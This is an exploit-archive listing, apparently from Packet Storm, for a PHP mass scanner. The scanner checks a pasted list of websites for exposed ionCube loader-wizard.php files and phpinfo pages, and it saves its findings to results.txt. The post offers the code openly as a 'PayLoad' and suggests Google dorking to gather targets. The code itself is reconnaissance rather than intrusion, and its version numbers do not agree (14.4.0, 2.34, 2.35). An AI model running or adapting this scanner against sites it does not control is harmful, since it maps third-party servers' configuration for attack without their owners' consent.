📄 ionCube Loader Wizard 14.4.0 Scanner_PACKETSTORM:212936

Description

ionCube Loader Wizard version 2.34 scanner that look for the installation file and displays PHP info to gather more information about the target...

Visit Original Source

Basic Information

ID PACKETSTORM:212936

Published Dec 17, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : ionCube Loader Wizard v 14.4.0 Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 137.0.1 (64 bits) |
| # Vendor : https://www.ioncube.com/loaders.php |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: This tool tested on 2.35, for ionCube Loader Wizard, scans the target for the installation file and displays PHP info to gather more information about the target.

Check the set of sites you are accessing through the interface.

About the file: loader-wizard.php

Inside large stores (such as /ioncube/, /tools/, etc.).

Check if the phpinfo() page is embedded

Displays results directly in your browser.

Detects sites with vulnerabilities related to the ionCube Loader Wizard.

Targets exposed phpinfo (useful for gathering information).

Security analysis and security audits for a group of sites.

Results are stored in a results.txt text file.

[+] save code as poc.php.

[+] Set TArget : 127.0.0.1/poc.php

[+] PayLoad :

<!DOCTYPE html>
<html lang="ar" dir="rtl">
<head>
<meta charset="UTF-8">
<title>فاحص مواقع loader-wizard.php و phpinfo المكشوف</title>
<style>
body { font-family: Tahoma, sans-serif; background-color: #f9f9f9; padding: 20px; }
textarea { width: 100%; height: 200px; font-size: 14px; }
input[type=submit] { padding: 10px 20px; margin-top: 10px; font-weight: bold; }
.result { background: #fff; border: 1px solid #ccc; padding: 15px; margin-top: 20px; white-space: pre-wrap; direction: ltr; text-align: left; }
h2 { color: #222; }
</style>
</head>
<body>
<h2>🛡️ فاحص loader-wizard.php + صفحة phpinfo المكشوفة</h2>
<form method="post">
<label>🔗 أدخل قائمة المواقع (كل موقع في سطر):</label><br>
<textarea name="sites" placeholder="example.com test.com"></textarea><br>
<input type="submit" name="scan" value="ابدأ الفحص">
</form>

<?php
if (isset($_POST['scan'])) {
$sites_input = trim($_POST['sites']);
if (!empty($sites_input)) {
$sites = explode("\n", $sites_input);
$paths = [
"/loader-wizard.php",
"/ioncube/loader-wizard.php",
"/tools/loader-wizard.php",
"/test/loader-wizard.php",
"/public/loader-wizard.php",
];

$report = "📋 تقرير فحص loader-wizard.php و phpinfo - " . date("Y-m-d H:i:s") . "\n\n";

echo '<div class="result"><strong>📋 نتائج الفحص:</strong><br><br>';

foreach ($sites as $site) {
$site = trim($site);
if (!$site) continue;
if (!preg_match("#^https?://#", $site)) $site = "http://$site";

$report .= "🌐 الموقع: $site\n";
echo "🌐 الموقع: $site\n";

$found = false;

foreach ($paths as $path) {
$url = rtrim($site, '/') . $path;
$headers = @get_headers($url);
if ($headers && strpos($headers[0], '200') !== false) {
$content = @file_get_contents($url);
if ($content && strpos($content, 'ionCube') !== false) {
$msg = "⚠️ تم العثور على loader-wizard.php في: $url\n";
echo $msg;
$report .= $msg;
$found = true;
break;
}
}
}

$phpinfo_url = rtrim($site, '/') . "/ioncube/loader-wizard.php?page=phpinfo";
$headers = @get_headers($phpinfo_url);
if ($headers && strpos($headers[0], '200') !== false) {
$content = @file_get_contents($phpinfo_url);
if ($content && strpos($content, 'PHP Version') !== false && strpos($content, 'Configuration') !== false) {
$msg = "🔍 ⚠️ صفحة phpinfo مكشوفة في: $phpinfo_url\n";
echo $msg;
$report .= $msg;
$found = true;
}
}

if (!$found) {
$msg = "✅ لا يوجد ملف loader-wizard.php أو صفحة phpinfo مكشوفة.\n";
echo $msg;
$report .= $msg;
}

$report .= str_repeat("-", 50) . "\n";
echo str_repeat("-", 50) . "\n";
}

// حفظ النتائج في ملف TXT
file_put_contents("results.txt", $report);

echo "<br>📁 تم حفظ النتائج في ملف <strong>results.txt</strong>";
echo '</div>';
}
}
?>
</body>
</html>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-17T16:36:49",
    "description": "ionCube Loader Wizard version 2.34 scanner that look for the installation file and displays PHP info to gather more information about the target...",
    "published": "2025-12-17T00:00:00",
    "modified": "2025-12-17T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 ionCube Loader Wizard 14.4.0 Scanner",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212936",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : ionCube Loader Wizard v 14.4.0 Scanner                                                                                      |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 137.0.1 (64 bits)                                                            |\n    | # Vendor    : https://www.ioncube.com/loaders.php                                                                                         |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Code Description: This tool tested on 2.35, for ionCube Loader Wizard, scans the target for the installation file and displays PHP info to gather more information about the target.\n    \n        Check the set of sites you are accessing through the interface.\n    \n        About the file: loader-wizard.php\n    \n        Inside large stores (such as /ioncube/, /tools/, etc.).\n    \n        Check if the phpinfo() page is embedded\n    \t\n    \tDisplays results directly in your browser.\n    \t\n        Detects sites with vulnerabilities related to the ionCube Loader Wizard.\n    \n        Targets exposed phpinfo (useful for gathering information).\n    \n        Security analysis and security audits for a group of sites.\n    \n        Results are stored in a results.txt text file.\n    \t\n    [+] save code as poc.php.\n    \n    [+] Set TArget : 127.0.0.1/poc.php\n    \n    [+] PayLoad :\n    \n    <!DOCTYPE html>\n    <html lang=\"ar\" dir=\"rtl\">\n    <head>\n        <meta charset=\"UTF-8\">\n        <title>\u0641\u0627\u062d\u0635 \u0645\u0648\u0627\u0642\u0639 loader-wizard.php \u0648 phpinfo \u0627\u0644\u0645\u0643\u0634\u0648\u0641</title>\n        <style>\n            body { font-family: Tahoma, sans-serif; background-color: #f9f9f9; padding: 20px; }\n            textarea { width: 100%; height: 200px; font-size: 14px; }\n            input[type=submit] { padding: 10px 20px; margin-top: 10px; font-weight: bold; }\n            .result { background: #fff; border: 1px solid #ccc; padding: 15px; margin-top: 20px; white-space: pre-wrap; direction: ltr; text-align: left; }\n            h2 { color: #222; }\n        </style>\n    </head>\n    <body>\n        <h2>\ud83d\udee1\ufe0f \u0641\u0627\u062d\u0635 loader-wizard.php + \u0635\u0641\u062d\u0629 phpinfo \u0627\u0644\u0645\u0643\u0634\u0648\u0641\u0629</h2>\n        <form method=\"post\">\n            <label>\ud83d\udd17 \u0623\u062f\u062e\u0644 \u0642\u0627\u0626\u0645\u0629 \u0627\u0644\u0645\u0648\u0627\u0642\u0639 (\u0643\u0644 \u0645\u0648\u0642\u0639 \u0641\u064a \u0633\u0637\u0631):</label><br>\n            <textarea name=\"sites\" placeholder=\"example.com
test.com\"></textarea><br>\n            <input type=\"submit\" name=\"scan\" value=\"\u0627\u0628\u062f\u0623 \u0627\u0644\u0641\u062d\u0635\">\n        </form>\n    \n    <?php\n    if (isset($_POST['scan'])) {\n        $sites_input = trim($_POST['sites']);\n        if (!empty($sites_input)) {\n            $sites = explode(\"\\n\", $sites_input);\n            $paths = [\n                \"/loader-wizard.php\",\n                \"/ioncube/loader-wizard.php\",\n                \"/tools/loader-wizard.php\",\n                \"/test/loader-wizard.php\",\n                \"/public/loader-wizard.php\",\n            ];\n    \n            $report = \"\ud83d\udccb \u062a\u0642\u0631\u064a\u0631 \u0641\u062d\u0635 loader-wizard.php \u0648 phpinfo - \" . date(\"Y-m-d H:i:s\") . \"\\n\\n\";\n    \n            echo '<div class=\"result\"><strong>\ud83d\udccb \u0646\u062a\u0627\u0626\u062c \u0627\u0644\u0641\u062d\u0635:</strong><br><br>';\n    \n            foreach ($sites as $site) {\n                $site = trim($site);\n                if (!$site) continue;\n                if (!preg_match(\"#^https?://#\", $site)) $site = \"http://$site\";\n    \n                $report .= \"\ud83c\udf10 \u0627\u0644\u0645\u0648\u0642\u0639: $site\\n\";\n                echo \"\ud83c\udf10 \u0627\u0644\u0645\u0648\u0642\u0639: $site\\n\";\n    \n                $found = false;\n    \n                foreach ($paths as $path) {\n                    $url = rtrim($site, '/') . $path;\n                    $headers = @get_headers($url);\n                    if ($headers && strpos($headers[0], '200') !== false) {\n                        $content = @file_get_contents($url);\n                        if ($content && strpos($content, 'ionCube') !== false) {\n                            $msg = \"\u26a0\ufe0f \u062a\u0645 \u0627\u0644\u0639\u062b\u0648\u0631 \u0639\u0644\u0649 loader-wizard.php \u0641\u064a: $url\\n\";\n                            echo $msg;\n                            $report .= $msg;\n                            $found = true;\n                            break;\n                        }\n                    }\n                }\n    \n                $phpinfo_url = rtrim($site, '/') . \"/ioncube/loader-wizard.php?page=phpinfo\";\n                $headers = @get_headers($phpinfo_url);\n                if ($headers && strpos($headers[0], '200') !== false) {\n                    $content = @file_get_contents($phpinfo_url);\n                    if ($content && strpos($content, 'PHP Version') !== false && strpos($content, 'Configuration') !== false) {\n                        $msg = \"\ud83d\udd0d \u26a0\ufe0f \u0635\u0641\u062d\u0629 phpinfo \u0645\u0643\u0634\u0648\u0641\u0629 \u0641\u064a: $phpinfo_url\\n\";\n                        echo $msg;\n                        $report .= $msg;\n                        $found = true;\n                    }\n                }\n    \n                if (!$found) {\n                    $msg = \"\u2705 \u0644\u0627 \u064a\u0648\u062c\u062f \u0645\u0644\u0641 loader-wizard.php \u0623\u0648 \u0635\u0641\u062d\u0629 phpinfo \u0645\u0643\u0634\u0648\u0641\u0629.\\n\";\n                    echo $msg;\n                    $report .= $msg;\n                }\n    \n                $report .= str_repeat(\"-\", 50) . \"\\n\";\n                echo str_repeat(\"-\", 50) . \"\\n\";\n            }\n    \n            // \u062d\u0641\u0638 \u0627\u0644\u0646\u062a\u0627\u0626\u062c \u0641\u064a \u0645\u0644\u0641 TXT\n            file_put_contents(\"results.txt\", $report);\n    \n            echo \"<br>\ud83d\udcc1 \u062a\u0645 \u062d\u0641\u0638 \u0627\u0644\u0646\u062a\u0627\u0626\u062c \u0641\u064a \u0645\u0644\u0641 <strong>results.txt</strong>\";\n            echo '</div>';\n        }\n    }\n    ?>\n    </body>\n    </html>\n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212936",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212936/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply